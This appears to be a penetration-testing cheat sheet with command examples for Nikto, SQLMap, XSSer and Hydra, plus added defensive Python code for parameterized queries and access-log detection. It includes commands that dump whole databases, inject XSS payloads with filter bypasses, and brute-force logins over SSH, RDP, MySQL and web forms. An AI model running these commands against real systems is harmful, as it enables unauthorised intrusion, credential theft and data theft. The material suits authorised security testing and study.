🛠️Nikto, SQLMap, XSSer & Hydra Overview

Nikto

Nikto is a powerful web server vulnerability scanner used to identify security issues on websites. Here are several ways to use Nikto effectively:

  1. Basic Web Server Scan:

    Perform a basic scan on a website:

    nikto -h https://www.example.com
  2. Scan Specific Port:

    Scan a specific port on the target:

    nikto -h https://www.example.com -p 8080
  3. Scan Multiple Hosts:

    Scan multiple hosts by listing them, one per line, in a file (hosts.txt) passed to -h:

    nikto -h hosts.txt
  4. Save Output to File:

    Save scan results to a file (output.txt):

    nikto -h https://www.example.com -o output.txt
  5. Full Scan with Manual Tuning:

    Perform a comprehensive scan with a one-hour time limit, every plugin enabled (@@ALL) and tuning option 8 (command execution / remote shell tests):

    nikto -h https://www.example.com -maxtime 3600s -Plugins @@ALL -Tuning 8
  6. SSL Certificate Check:

    Force SSL mode for the scan; Nikto reports the server's certificate details in its output:

    nikto -h https://www.example.com -ssl
  7. Scan with Authentication:

    Perform a scan with authentication credentials (admin:password):

    nikto -h https://www.example.com -id admin:password
  8. Suppress Output:

    Silence console output while still writing the report to a file (useful for scripting):

    nikto -h https://www.example.com -o output.txt > /dev/null
  9. Scan Specific Paths:

    Prepend a root directory (/app) to every request so only that path is scanned, checking all CGI directories with tuning option 2 (misconfiguration / default files); -root takes a single value, so run a second scan with -root /secure for the other path:

    nikto -h https://www.example.com -C all -Tuning 2 -p 443 -root /app
  10. Disable Certain Checks:

    Exclude a class of checks with the reverse tuning option x (here x4 excludes the injection / XSS tests):

    nikto -h https://www.example.com -Tuning x4

SQLMap

SQLMap is a powerful command-line tool used for detecting and exploiting SQL injection vulnerabilities in web applications. Here are several examples of how to use SQLMap effectively:

  1. Basic Scan for SQL Injection:

    Perform a basic scan to detect SQL injection vulnerabilities:

    sqlmap -u "https://www.example.com/page?id=1"
  2. Detecting SQL Injection and Getting Database Information:

    Detect SQL injection and retrieve database information:

    sqlmap -u "https://www.example.com/page?id=1" --dbs
  3. Enumerating Tables in a Database:

    Enumerate tables in a specific database (dbname):

    sqlmap -u "https://www.example.com/page?id=1" -D dbname --tables
  4. Dumping Data from a Specific Table:

    Dump data from a specific table (users):

    sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --dump
  5. Exploiting Time-Based Blind SQL Injection:

    Exploit time-based blind SQL injection technique with a specified time delay (5 seconds):

    sqlmap -u "https://www.example.com/page?id=1" --technique=T --time-sec=5
  6. Testing a Specific POST Parameter:

    Send POST data (param=value) and test only the named parameter (param); sqlmap generates its own payloads, and --prefix/--suffix can shape them when the target needs particular quoting:

    sqlmap -u "https://www.example.com/page?id=1" --data="param=value" -p param
  7. Dumping All Databases:

    Dump the contents of every database on the target server:

    sqlmap -u "https://www.example.com/page?id=1" --dump-all
  8. Enumerating Table Columns:

    Enumerate the columns of a specific table (dbname.users); where the DBMS exposes no schema information, --common-columns brute forces column names instead:

    sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --columns
  9. Exploiting Union-Based SQL Injection:

    Exploit union-based SQL injection technique:

    sqlmap -u "https://www.example.com/page?id=1" --technique=U
  10. Using a Configuration File:

    Use SQLMap with a configuration file (sqlmapconfig.conf):

    sqlmap -c sqlmapconfig.conf
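The flaw that sqlmap's boolean-based tests on a parameter like id=1 detect is untrusted input concatenated into SQL text. The following Python example is added here for defenders and is not part of the page's tool list: it builds a constructed in-memory SQLite table standing in for the page?id=1 backend and contrasts the vulnerable query with a validated, parameterized one.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the page?id=1 backend (sample data, not real).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, secret TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        (1, "Home", "public"),
        (2, "Admin", "internal-only"),
        (3, "Reports", "quarterly"),
    ])
    return conn

def lookup_vulnerable(conn, page_id):
    # BAD: the request parameter is pasted into the SQL text, so any operator or quote
    # in the input becomes part of the query. This is the condition sqlmap's tests detect.
    sql = "SELECT id, title FROM pages WHERE id = " + page_id
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, page_id):
    # GOOD: validate the type first, then bind the value as a parameter so the
    # database never parses it as SQL.
    if not page_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title FROM pages WHERE id = ?", (int(page_id),)).fetchall()

def demo():
    # Runs both lookups with a normal id and with the boolean tautology
    # (id=1 OR 1=1) that sqlmap's boolean-based technique sends.
    conn = make_db()
    normal, tautology = "1", "1 OR 1=1"
    results = {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_tautology": lookup_vulnerable(conn, tautology),   # returns every row
        "safe_normal": lookup_hardened(conn, normal),
    }
    try:
        lookup_hardened(conn, tautology)
        results["safe_tautology"] = "executed"
    except ValueError:
        results["safe_tautology"] = "rejected"
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```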

XSSer

XSSer is a command-line tool designed for detecting and exploiting Cross-Site Scripting (XSS) vulnerabilities in web applications. Here are several examples of how to use XSSer effectively:

  1. Basic Scan for Stored XSS:

    Test a POST parameter (comment) on a profile page for XSS; a payload the application stores and later renders indicates stored XSS:

    xsser -u "https://www.example.com/profile?id=1" -p "comment="
  2. DOM-based XSS Scan:

    Run XSSer's DOM technique (--Dom, anchor-based injection) against the target:

    xsser -u "https://www.example.com/page" --Dom
  3. Scanning Multiple URLs:

    Scan multiple URLs listed in a file (urls.txt):

    xsser -i urls.txt
  4. Cookie-based XSS Testing:

    Send a session cookie (auth=12345) with each request so that pages behind the login are tested too:

    xsser -u "https://www.example.com/login" --cookie="auth=12345"
  5. Reflected XSS Detection:

    Detect reflected XSS with a custom payload (<script>alert(1)</script>) in a query parameter (q):

    xsser -u "https://www.example.com" -g "/search?q=" --payload="<script>alert(1)</script>"
  6. Verbose Scan with Custom Payload:

    Inject a custom payload (<script>alert(1)</script>) into a POST parameter (name) with verbose output:

    xsser -u "https://www.example.com/profile" -p "name=" --payload="<script>alert(1)</script>" -v
  7. Custom Final Payload:

    Supply your own final injection code with --Fp (replace FINAL_PAYLOAD with the code to test) while sending the session cookie (auth=12345):

    xsser -u "https://www.example.com/profile" --cookie="auth=12345" --Fp="FINAL_PAYLOAD"
  8. Trying the Built-in Vector List:

    Try XSSer's built-in list of reported vectors against the target instead of a single payload:

    xsser -u "https://www.example.com/page" --auto
  9. Custom User-Agent Header:

    Send requests with a custom User-Agent header (MyCustomUserAgent):

    xsser -u "https://www.example.com/page" --user-agent="MyCustomUserAgent"
  10. XSS Filter Bypass Attempt:

    Encode the vectors with one of XSSer's bypassers (--Str for String.fromCharCode(), --Une for unescape(), --Hex for hexadecimal) to test whether a filter can be evaded:

    xsser -u "https://www.example.com/page" --Hex

Hydra

Hydra is a versatile command-line tool for performing brute force attacks against various protocols and services. Here are several examples of how to use Hydra effectively:

HTTP/HTTPS Authentication

  1. Brute Force Attack on Login Form:

    Perform a brute force attack on a login form with a specific username (admin) and passwords from a file (passwords.txt):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  2. Dictionary Attack with Custom Usernames:

    Conduct a dictionary attack using custom usernames (users.txt) and passwords (passwords.txt):

    hydra -L users.txt -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  3. Using Custom User-Agent Header:

    Send requests with a custom User-Agent header (MyCustomUserAgent); extra headers go inside the form specification with H=:

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid credentials:H=User-Agent: MyCustomUserAgent"
  4. Specifying a Non-Standard Port:

    Specify a non-standard port (8080) for the target service:

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -s 8080
  5. Using a Proxy for Requests:

    Route requests through a SOCKS5 proxy (localhost:9050) via the HYDRA_PROXY environment variable (Hydra has no proxy command-line flag):

    HYDRA_PROXY=socks5://localhost:9050 hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  6. Brute Forcing Different HTTP Methods:

    Use the module matching the form's HTTP method (http-get-form for GET, http-post-form for POST):

    hydra -l admin -P passwords.txt example.com http-get-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  7. Parallel Login Attempts:

    Increase the number of parallel login attempts (16):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -t 16
  8. Stopping After the First Valid Pair:

    Stop as soon as a valid login/password pair is found (-f stops per host, -F stops the whole run):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -F
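From the defender's side, the Nikto, SQLMap, XSSer and Hydra usage above leaves recognisable traces in a web server's access log. The following Python example is added here and is not code from any of those projects: it runs a few detection rules over a constructed combined-format access log (default tool User-Agents, a script tag in a request path, bursts of 404s, and bursts of POSTs to /login.php from one source); the IPs, timestamps and thresholds are assumed sample values to tune for a real site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Default User-Agent fragments the tools send unless overridden (XSSer spoofs its agent by default).
TOOL_UA = {"Nikto": "nikto", "sqlmap": "sqlmap", "Hydra": "(hydra)"}

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def _bump(seen, ts, window):   # per-source sliding window; returns events inside it
    seen.append(ts)
    while ts - seen[0] > window:
        seen.popleft()
    return len(seen)

def analyse(lines, login_path="/login.php", window=timedelta(seconds=60), login_max=5, nf_max=5):
    findings, logins, notfound = set(), defaultdict(deque), defaultdict(deque)
    for rec in filter(None, map(parse, lines)):
        ip, ua, path = rec["ip"], rec["ua"].lower(), rec["path"].lower()
        for tool, frag in TOOL_UA.items():
            if frag in ua:
                findings.add((ip, f"User-Agent advertises {tool}"))
        if "<script" in path or "%3cscript" in path:          # XSS probe marker
            findings.add((ip, "script tag in request path (XSS probe)"))
        if rec["method"] == "POST" and path == login_path and _bump(logins[ip], rec["ts"], window) > login_max:
            findings.add((ip, f"more than {login_max} login POSTs within {window.seconds}s"))  # Hydra
        if rec["status"] == "404" and _bump(notfound[ip], rec["ts"], window) > nf_max:
            findings.add((ip, f"more than {nf_max} 404s within {window.seconds}s"))  # Nikto probing
    return sorted(findings)
# Constructed sample log (not real traffic): a normal visitor, a Nikto hit, a sqlmap hit,
# an XSS probe, and a Hydra burst hiding behind the custom User-Agent from example 3 above.
SAMPLE_LOG = [
    '198.51.100.9 - - [10/Mar/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"',
    '203.0.113.8 - - [10/Mar/2024:10:00:02 +0000] "GET /page?id=1%20AND%201=1 HTTP/1.1" 200 301 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Mar/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 220 "-" "Mozilla/5.0"',
] + [f'203.0.113.50 - - [10/Mar/2024:10:01:{s:02d} +0000] "POST /login.php HTTP/1.1" 200 88 "-" "MyCustomUserAgent"'
     for s in range(6)]

if __name__ == "__main__":
    for ip, reason in analyse(SAMPLE_LOG):
        print(ip, reason)
```

The Hydra burst is flagged by rate even though it carries the custom User-Agent from example 3, while the XSS probe is caught only by its payload because XSSer spoofs its User-Agent by default.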

Other Protocol Examples

Here are examples for brute forcing passwords across various protocols:

  • SSH:

    hydra -l username -P passwords.txt ssh://target_ip
  • FTP:

    hydra -l admin -P wordlist.txt ftp://ftp.example.com
  • SMTP:

    hydra -l user@example.com -P passwords.txt smtp://mail.example.com
  • MySQL:

    hydra -l root -P passwords.txt mysql://target_ip
  • RDP:

    hydra -l administrator -P passwords.txt rdp://target_ip
  • VNC:

    hydra -l admin -P passwords.txt vnc://target_ip
  • Telnet:

    hydra -l admin -P passwords.txt telnet://target_ip



Hacker's Mantra: Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause.
